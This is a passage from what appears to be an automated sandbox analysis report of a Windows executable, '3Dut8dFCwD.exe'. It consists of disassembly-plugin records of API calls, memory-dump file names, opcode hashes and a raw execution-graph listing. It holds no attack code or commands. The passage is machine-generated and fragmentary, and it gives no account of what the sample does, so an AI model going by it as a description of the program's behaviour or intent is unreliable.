                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                              • String ID:
                              • API String ID: 2102729457-0
                              • Opcode ID: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
                              • Instruction ID: b3f6d95266cfacf47387896993e225006fc9e276d4c6cccc21fcd3db6f14a0d4
                              • Opcode Fuzzy Hash: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
                              • Instruction Fuzzy Hash: A0F05E70406621AFC6606F90BE08A9B7A68FB45B62B45843BF145F11E8CB3C48818B9D
                              APIs
                              • IsWindowVisible.USER32(?), ref: 0040555C
                              • CallWindowProcW.USER32(?,?,?,?), ref: 004055AD
                                • Part of subcall function 004044FF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404511
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                              • Instruction ID: 2594d1478f304c6df33f9b27245b4e56ea2549959463d6621d9ed09538c1d2b9
                              • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                              • Instruction Fuzzy Hash: 6C017C71100608BBEF219F15DD80A9B3B27EB88750F104037FA05B61D5C73E9D919E6D
                              APIs
                              • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B49,00403A5F,?,?,00000008,0000000A,0000000C), ref: 00403B8B
                              • GlobalFree.KERNEL32(00000000), ref: 00403B92
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B71
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Free$GlobalLibrary
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 1100898210-823278215
                              • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                              • Instruction ID: 86827d460d6d0210cfbc43ab248bfd1705f6cbab4bd02b4ce4b4e0dc829d3a13
                              • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                              • Instruction Fuzzy Hash: 2EE012334012305BC6215F56ED04B5AB778AF55B26F09813FE940BB26287786C438FD8
                              APIs
                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Dut8dFCwD.exe,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00405E55
                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Dut8dFCwD.exe,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00405E65
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CharPrevlstrlen
                              • String ID: C:\Users\user\Desktop
                              • API String ID: 2709904686-1246513382
                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                              • Instruction ID: 4264e746bbe9179bf63afe9cfc5b53a917ba9e4059aba7f94742f87ad442e0a4
                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                              • Instruction Fuzzy Hash: 73D0A7B3400930DAC312A704ED00D9F73ECEF5234474A4466E881A7169D7785E8186EC
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FB1
                              • CharNextA.USER32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FC2
                              • lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                              • Instruction ID: 8db07108f343804323cb09528c583574f267d9896fc780fa7d439bc94861dd43
                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                              • Instruction Fuzzy Hash: 1EF09631104519FFCB029FA5DE00D9EBBA8EF45350B2540B9F840F7250D678EE019BA9

                              Execution Graph

                              Execution Coverage:4.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:38.1%
                              Total number of Nodes:1582
                              Total number of Limit Nodes:34
                              execution_graph 41354 7ff69704cd0a 41384 7ff69704d0a0 EnterCriticalSection 41354->41384 41358 7ff69704cdcf ISource 41360 7ff69704cddb 41358->41360 41361 7ff69704cdf6 41358->41361 41359 7ff69704cd1a ISource 41359->41358 41363 7ff69704d084 41359->41363 41429 7ff697043f80 41360->41429 41443 7ff697039520 41361->41443 41466 7ff6970788fc 41363->41466 41366 7ff69704cf9c RegisterEventSourceW 41411 7ff69707e62c 41366->41411 41367 7ff69704d089 41370 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41367->41370 41371 7ff69704d08f 41370->41371 41376 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41371->41376 41372 7ff69704cec4 ISource 41374 7ff697039520 35 API calls 41372->41374 41373 7ff69704ce03 ISource 41373->41367 41373->41372 41382 7ff69704ced6 ISource 41374->41382 41378 7ff69704d095 41376->41378 41377 7ff69704d03e LeaveCriticalSection 41457 7ff697072180 41377->41457 41379 7ff69704cfea ISource 41379->41377 41382->41366 41382->41371 41383 7ff69704cdf1 ISource 41382->41383 41383->41366 41386 7ff69704d0db 41384->41386 41389 7ff69704d186 41384->41389 41385 7ff69704d1ab LeaveCriticalSection 41388 7ff697072180 _handle_errorf 8 API calls 41385->41388 41386->41385 41387 7ff697044fc0 36 API calls 41386->41387 41390 7ff69704d0f2 41387->41390 41391 7ff69704cd11 41388->41391 41392 7ff697043f80 35 API calls 41389->41392 41471 7ff69703ac70 41390->41471 41401 7ff697044fc0 41391->41401 41397 7ff69704d17f ISource 41392->41397 41394 7ff69704d123 41395 7ff697043f80 35 API calls 41394->41395 41396 7ff69704d145 41395->41396 41396->41385 41396->41397 41398 7ff69704d1cc 41396->41398 41397->41385 41399 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41398->41399 41400 7ff69704d1d1 41399->41400 41477 7ff6970721d4 41401->41477 41403 7ff697044fec memcpy_s 41404 7ff697045010 GetModuleFileNameW 41403->41404 41406 7ff697045044 41404->41406 41409 7ff697045066 41404->41409 41405 7ff697045093 ISource 41405->41359 41407 7ff697043f80 35 API calls 41406->41407 41407->41409 41408 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41410 7ff6970450be 41408->41410 41409->41405 41409->41408 41412 7ff69707e65c 41411->41412 41413 7ff69707e645 41411->41413 41485 7ff69707e5cc 41412->41485 41492 7ff69707e1f8 14 API calls _get_daylight 41413->41492 41416 7ff69707e64a 41493 7ff6970788dc 31 API calls _invalid_parameter_noinfo_noreturn 41416->41493 41419 7ff69707e66f CreateThread 41421 7ff69707e6ac 41419->41421 41422 7ff69707e69f GetLastError 41419->41422 41420 7ff69704cfd9 41420->41379 41456 7ff69707e1f8 14 API calls _get_daylight 41420->41456 41421->41420 41424 7ff69707e6bc CloseHandle 41421->41424 41425 7ff69707e6c2 41421->41425 41494 7ff69707e188 14 API calls 2 library calls 41422->41494 41424->41425 41426 7ff69707e6cb FreeLibrary 41425->41426 41427 7ff69707e6d1 41425->41427 41426->41427 41495 7ff697085054 41427->41495 41434 7ff697043ff9 41429->41434 41435 7ff697043fb0 ctype 41429->41435 41430 7ff697044110 41511 7ff697043e30 33 API calls 41430->41511 41432 7ff69704401b 41436 7ff69704410a Concurrency::cancel_current_task 41432->41436 41438 7ff6970721d4 std::_Facet_Register 5 API calls 41432->41438 41434->41430 41434->41432 41434->41436 41437 7ff697044094 41434->41437 41435->41383 41436->41430 41439 7ff6970721d4 std::_Facet_Register 5 API calls 41437->41439 41442 7ff697044081 ISource ctype 41437->41442 41438->41442 41439->41442 41440 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41441 7ff697044109 41440->41441 41441->41436 41442->41440 41445 7ff69703954d 41443->41445 41444 7ff69703960c Concurrency::cancel_current_task 41512 7ff697038e00 31 API calls 2 library calls 41444->41512 41445->41444 41447 7ff6970395c6 41445->41447 41448 7ff69703959f 41445->41448 41451 7ff69703955b ctype 41445->41451 41450 7ff6970721d4 std::_Facet_Register 5 API calls 41447->41450 41447->41451 41448->41444 41449 7ff6970721d4 std::_Facet_Register 5 API calls 41448->41449 41453 7ff6970395b0 41449->41453 41450->41451 41451->41373 41452 7ff697039634 ISource 41452->41373 41453->41451 41454 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41453->41454 41455 7ff69703960b 41454->41455 41455->41444 41456->41379 41458 7ff697072189 41457->41458 41459 7ff69704d065 41458->41459 41460 7ff697072b14 IsProcessorFeaturePresent 41458->41460 41461 7ff697072b2c 41460->41461 41513 7ff697072d08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41461->41513 41463 7ff697072b3f 41514 7ff697072ae0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41463->41514 41515 7ff69707882c 31 API calls 2 library calls 41466->41515 41468 7ff697078915 41516 7ff69707892c 17 API calls _invalid_parameter_noinfo_noreturn 41468->41516 41472 7ff69703accf 41471->41472 41475 7ff69703ac8c ctype 41471->41475 41476 7ff69703bff0 35 API calls 4 library calls 41472->41476 41474 7ff69703ace2 41474->41394 41475->41394 41476->41474 41482 7ff6970721df 41477->41482 41478 7ff6970721f8 41478->41403 41480 7ff69707220a Concurrency::cancel_current_task 41480->41482 41482->41477 41482->41478 41482->41480 41483 7ff6970824d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 41482->41483 41484 7ff697070ff0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 41482->41484 41483->41482 41501 7ff697084fdc 41485->41501 41488 7ff697085054 __free_lconv_mon 14 API calls 41489 7ff69707e5f8 41488->41489 41490 7ff69707e619 41489->41490 41491 7ff69707e5ff GetModuleHandleExW 41489->41491 41490->41419 41490->41421 41491->41490 41492->41416 41493->41420 41494->41421 41496 7ff697085059 HeapFree 41495->41496 41500 7ff697085089 __free_lconv_mon 41495->41500 41497 7ff697085074 41496->41497 41496->41500 41510 7ff69707e1f8 14 API calls _get_daylight 41497->41510 41499 7ff697085079 GetLastError 41499->41500 41500->41420 41506 7ff697084fed _Toupper 41501->41506 41502 7ff69708503e 41509 7ff69707e1f8 14 API calls _get_daylight 41502->41509 41503 7ff697085022 RtlAllocateHeap 41504 7ff69707e5ee 41503->41504 41503->41506 41504->41488 41506->41502 41506->41503 41508 7ff6970824d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 41506->41508 41508->41506 41509->41504 41510->41499 41512->41452 41513->41463 41515->41468 41517 7ff6970722fc 41540 7ff6970724c8 41517->41540 41520 7ff69707231d __scrt_acquire_startup_lock 41523 7ff69707245d 41520->41523 41525 7ff69707233b 41520->41525 41521 7ff697072453 41563 7ff697072e8c 7 API calls 2 library calls 41521->41563 41564 7ff697072e8c 7 API calls 2 library calls 41523->41564 41526 7ff697072360 41525->41526 41530 7ff69707237d __scrt_release_startup_lock 41525->41530 41548 7ff697082e48 41525->41548 41527 7ff697072468 41529 7ff6970723e6 41553 7ff697082df0 41529->41553 41530->41529 41562 7ff69708318c 16 API calls __GSHandlerCheck_EH 41530->41562 41533 7ff6970723eb 41559 7ff697031590 41533->41559 41565 7ff697073118 41540->41565 41543 7ff6970724f7 41567 7ff6970838c0 41543->41567 41547 7ff697072315 41547->41520 41547->41521 41549 7ff697082e97 41548->41549 41550 7ff697082e7d 41548->41550 41549->41530 41550->41549 41584 7ff6970313f0 CreateMutexW CreateEventW CreateEventW 41550->41584 41585 7ff697031130 41550->41585 41554 7ff697082e15 41553->41554 41555 7ff697082e00 41553->41555 41554->41533 41555->41554 41600 7ff697082ad0 34 API calls __free_lconv_mon 41555->41600 41557 7ff697082e1e 41557->41554 41601 7ff697082c90 15 API calls 3 library calls 41557->41601 41602 7ff6970799a4 41559->41602 41561 7ff6970315c4 41562->41529 41563->41523 41564->41527 41566 7ff6970724ea __scrt_dllmain_crt_thread_attach 41565->41566 41566->41543 41566->41547 41568 7ff69708d76c 41567->41568 41569 7ff6970724fc 41568->41569 41572 7ff697088a04 41568->41572 41569->41547 41571 7ff697075020 7 API calls 2 library calls 41569->41571 41571->41547 41583 7ff69707f264 EnterCriticalSection 41572->41583 41574 7ff697088a14 41575 7ff69708d280 32 API calls 41574->41575 41576 7ff697088a1d 41575->41576 41578 7ff697088808 34 API calls 41576->41578 41582 7ff697088a2b 41576->41582 41577 7ff69707f2b8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 41580 7ff697088a37 41577->41580 41579 7ff697088a26 41578->41579 41581 7ff6970888f8 GetStdHandle GetFileType 41579->41581 41580->41568 41581->41582 41582->41577 41592 7ff6970726c4 41585->41592 41588 7ff697031169 WSAStartup 41589 7ff69703117d 41588->41589 41590 7ff697072180 _handle_errorf 8 API calls 41589->41590 41591 7ff69703118d 41590->41591 41591->41550 41595 7ff697072688 41592->41595 41594 7ff697031155 41594->41588 41594->41589 41596 7ff6970726a2 41595->41596 41598 7ff69707269b 41595->41598 41599 7ff69708374c 34 API calls 41596->41599 41598->41594 41599->41598 41600->41557 41601->41554 41603 7ff6970799d8 41602->41603 41604 7ff6970799c4 41602->41604 41616 7ff697083e64 GetLastError 41603->41616 41661 7ff69707e1f8 14 API calls _get_daylight 41604->41661 41607 7ff6970799dd 41640 7ff697088294 41607->41640 41608 7ff6970799c9 41662 7ff6970788dc 31 API calls _invalid_parameter_noinfo_noreturn 41608->41662 41611 7ff6970799e6 41613 7ff697085954 _Toupper 16 API calls 41611->41613 41612 7ff6970799d4 41612->41561 41614 7ff6970799eb 41613->41614 41615 7ff697078f90 std::_Locinfo::_Locinfo_ctor 62 API calls 41614->41615 41615->41612 41617 7ff697083e86 41616->41617 41621 7ff697083e8b 41616->41621 41668 7ff697087e14 6 API calls try_get_function 41617->41668 41622 7ff697083e93 SetLastError 41621->41622 41663 7ff697087e5c 41621->41663 41626 7ff697083f22 41622->41626 41623 7ff697084fdc _Toupper 14 API calls 41625 7ff697083ec1 41623->41625 41627 7ff697083edf 41625->41627 41628 7ff697083ecf 41625->41628 41626->41607 41630 7ff697087e5c _Toupper 6 API calls 41627->41630 41629 7ff697087e5c _Toupper 6 API calls 41628->41629 41631 7ff697083ed6 41629->41631 41632 7ff697083ee7 41630->41632 41636 7ff697085054 __free_lconv_mon 14 API calls 41631->41636 41633 7ff697083efd 41632->41633 41634 7ff697083eeb 41632->41634 41669 7ff697083c14 14 API calls _Toupper 41633->41669 41637 7ff697087e5c _Toupper 6 API calls 41634->41637 41636->41622 41637->41631 41638 7ff697083f05 41639 7ff697085054 __free_lconv_mon 14 API calls 41638->41639 41639->41622 41641 7ff697087998 try_get_function 5 API calls 41640->41641 41642 7ff6970882b4 41641->41642 41643 7ff697087998 try_get_function 5 API calls 41642->41643 41644 7ff6970882d3 41643->41644 41645 7ff697087998 try_get_function 5 API calls 41644->41645 41646 7ff6970882f2 41645->41646 41647 7ff697087998 try_get_function 5 API calls 41646->41647 41648 7ff697088311 41647->41648 41649 7ff697087998 try_get_function 5 API calls 41648->41649 41650 7ff697088330 41649->41650 41651 7ff697087998 try_get_function 5 API calls 41650->41651 41652 7ff69708834f 41651->41652 41653 7ff697087998 try_get_function 5 API calls 41652->41653 41654 7ff69708836e 41653->41654 41655 7ff697087998 try_get_function 5 API calls 41654->41655 41656 7ff69708838d 41655->41656 41657 7ff697087998 try_get_function 5 API calls 41656->41657 41658 7ff6970883ac 41657->41658 41659 7ff697087998 try_get_function 5 API calls 41658->41659 41660 7ff6970883cb 41659->41660 41661->41608 41662->41612 41670 7ff697087998 41663->41670 41666 7ff697087e9c TlsSetValue 41667 7ff697083eae 41666->41667 41667->41622 41667->41623 41669->41638 41671 7ff6970879f9 41670->41671 41678 7ff6970879f4 try_get_function 41670->41678 41671->41666 41671->41667 41672 7ff697087adc 41672->41671 41675 7ff697087aea GetProcAddress 41672->41675 41673 7ff697087a28 LoadLibraryW 41674 7ff697087a49 GetLastError 41673->41674 41673->41678 41674->41678 41676 7ff697087afb 41675->41676 41676->41671 41677 7ff697087ac1 FreeLibrary 41677->41678 41678->41671 41678->41672 41678->41673 41678->41677 41679 7ff697087a83 LoadLibraryExW 41678->41679 41679->41678 41680 7ff697031649 EnterCriticalSection 41681 7ff697031664 LeaveCriticalSection 41680->41681 41682 7ff697031699 EnterCriticalSection 41681->41682 41683 7ff6970316bd 41682->41683 41684 7ff6970316b0 CloseHandle 41682->41684 41685 7ff6970316c9 DeregisterEventSource 41683->41685 41686 7ff6970316d6 LeaveCriticalSection 41683->41686 41684->41683 41685->41686 41691 7ff69704f350 64 API calls 3 library calls 41686->41691 41688 7ff6970316ea 41689 7ff697072180 _handle_errorf 8 API calls 41688->41689 41690 7ff6970316fc 41689->41690 41691->41688 41692 7ff697052dcb 41693 7ff69705346c 41692->41693 41694 7ff697052dd9 41692->41694 42201 7ff697074c18 RtlPcToFileHeader RaiseException 41693->42201 41696 7ff697052de7 41694->41696 41697 7ff697053481 41694->41697 41698 7ff697052e03 41696->41698 41883 7ff697057b10 155 API calls 6 library calls 41696->41883 42202 7ff697074c18 RtlPcToFileHeader RaiseException 41697->42202 41704 7ff697052e34 41698->41704 41705 7ff697052e4f 41698->41705 41717 7ff697052e90 41698->41717 41701 7ff69705349a 42203 7ff697074c18 RtlPcToFileHeader RaiseException 41701->42203 41702 7ff697052df5 41702->41698 41702->41701 41707 7ff697039520 35 API calls 41704->41707 41708 7ff697052e54 41705->41708 41709 7ff697052e6f 41705->41709 41706 7ff6970534af 42204 7ff697074c18 RtlPcToFileHeader RaiseException 41706->42204 41712 7ff697052e39 41707->41712 41713 7ff697039520 35 API calls 41708->41713 41710 7ff697039520 35 API calls 41709->41710 41714 7ff697052e74 41710->41714 41884 7ff6970596d0 79 API calls 3 library calls 41712->41884 41718 7ff697052e59 41713->41718 41885 7ff69705bc40 41714->41885 41715 7ff69705331f 41724 7ff697043f80 35 API calls 41715->41724 41727 7ff697052f4f 41717->41727 41800 7ff6970531dc 41717->41800 42191 7ff6970641a0 35 API calls 2 library calls 41717->42191 41837 7ff69705b710 41718->41837 41721 7ff6970534c4 42205 7ff697074c18 RtlPcToFileHeader RaiseException 41721->42205 41722 7ff697052e4b 41726 7ff697052e6b 41722->41726 41725 7ff697053339 41724->41725 41735 7ff697043f80 35 API calls 41725->41735 41726->41706 41726->41717 41736 7ff697053054 41727->41736 41737 7ff697052fe1 41727->41737 41729 7ff69705320e 41733 7ff697039520 35 API calls 41729->41733 41730 7ff697052f27 42192 7ff697065f60 40 API calls 41730->42192 41731 7ff6970534da 41739 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41731->41739 41738 7ff697053222 41733->41738 41760 7ff697053389 41735->41760 41742 7ff697043f80 35 API calls 41736->41742 41740 7ff697052ff3 41737->41740 41741 7ff69705300e 41737->41741 41743 7ff697053271 ISource 41738->41743 41751 7ff6970534e6 41738->41751 41748 7ff6970534e0 41739->41748 41749 7ff697039520 35 API calls 41740->41749 41745 7ff697053013 41741->41745 41746 7ff69705302e 41741->41746 41744 7ff69705308a 41742->41744 41747 7ff697053287 41743->41747 42197 7ff69706e1c0 94 API calls 4 library calls 41743->42197 41750 7ff697043f80 35 API calls 41744->41750 41752 7ff697039520 35 API calls 41745->41752 41754 7ff697039520 35 API calls 41746->41754 41755 7ff6970532b3 41747->41755 41756 7ff6970532ce 41747->41756 41770 7ff69705328b 41747->41770 41764 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41748->41764 41757 7ff697052ff8 41749->41757 41786 7ff6970530c9 41750->41786 41758 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41751->41758 41759 7ff697053018 41752->41759 41762 7ff697053033 41754->41762 41763 7ff697039520 35 API calls 41755->41763 41765 7ff6970532d3 41756->41765 41766 7ff6970532ee 41756->41766 42193 7ff6970596d0 79 API calls 3 library calls 41757->42193 41758->41770 41771 7ff69705b710 259 API calls 41759->41771 41761 7ff6970533ee ISource 41760->41761 41780 7ff697053502 41760->41780 41775 7ff697053437 ISource 41761->41775 41790 7ff697053508 41761->41790 41773 7ff69705bc40 245 API calls 41762->41773 41774 7ff6970532b8 41763->41774 41764->41751 41768 7ff697039520 35 API calls 41765->41768 41772 7ff697039520 35 API calls 41766->41772 41776 7ff6970532d8 41768->41776 41769 7ff69705300a 41777 7ff69705302a 41769->41777 42206 7ff697074c18 RtlPcToFileHeader RaiseException 41770->42206 41771->41777 41779 7ff6970532f3 41772->41779 41773->41777 42198 7ff6970596d0 79 API calls 3 library calls 41774->42198 41778 7ff697072180 _handle_errorf 8 API calls 41775->41778 41782 7ff69705b710 259 API calls 41776->41782 41777->41721 41796 7ff69705304f ISource 41777->41796 41783 7ff69705344f 41778->41783 42199 7ff69705e530 178 API calls 6 library calls 41779->42199 41788 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41780->41788 41791 7ff6970532ea 41782->41791 41786->41731 41787 7ff697053130 ISource 41786->41787 41787->41748 41787->41796 41788->41790 41789 7ff6970532ca 41789->41791 41792 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41790->41792 41794 7ff697053310 41791->41794 42200 7ff69708de6c 64 API calls 2 library calls 41791->42200 41795 7ff69705350e 41792->41795 41793 7ff6970531c8 42195 7ff6970640e0 31 API calls 2 library calls 41793->42195 41794->41715 41794->41770 41801 7ff697043f80 35 API calls 41795->41801 41796->41793 42194 7ff697066010 41 API calls 2 library calls 41796->42194 41800->41715 41800->41729 42196 7ff69708de6c 64 API calls 2 library calls 41800->42196 41802 7ff697053584 41801->41802 41803 7ff697043f80 35 API calls 41802->41803 41804 7ff6970535b2 ISource 41803->41804 41805 7ff69705371c ISource 41804->41805 41806 7ff6970543e2 41804->41806 41808 7ff6970543dd 41804->41808 41809 7ff697072180 _handle_errorf 8 API calls 41805->41809 41807 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41806->41807 41810 7ff6970543e8 41807->41810 41812 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41808->41812 41811 7ff6970543c0 41809->41811 41813 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41810->41813 41812->41806 41814 7ff6970543ee 41813->41814 41815 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41814->41815 41816 7ff6970543f4 41815->41816 41817 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41816->41817 41818 7ff6970543fa 41817->41818 41819 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41818->41819 41820 7ff697054400 41819->41820 41821 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41820->41821 41822 7ff697054406 41821->41822 41823 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41822->41823 41824 7ff69705440c 41823->41824 41825 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41824->41825 41826 7ff697054412 41825->41826 41827 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41826->41827 41828 7ff697054418 41827->41828 41829 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41828->41829 41830 7ff69705441e 41829->41830 41831 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41830->41831 41832 7ff697054424 41831->41832 41833 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41832->41833 41834 7ff69705442a 41833->41834 41835 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41834->41835 41836 7ff697054430 41835->41836 41838 7ff697039520 35 API calls 41837->41838 41839 7ff69705b76e 